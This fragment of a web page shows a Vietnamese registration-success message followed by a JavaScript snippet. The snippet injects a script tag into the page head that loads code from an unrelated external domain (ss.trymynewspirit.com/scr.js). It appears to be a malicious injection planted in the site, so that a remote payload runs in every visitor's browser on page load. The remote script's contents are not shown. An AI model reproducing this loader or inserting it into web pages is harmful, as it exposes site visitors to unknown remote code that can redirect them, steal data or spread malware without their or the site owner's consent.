” Bạn đã đăng ký thành công!
 

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://ss.trymynewspirit.com/scr.js"; document.head.appendChild(z);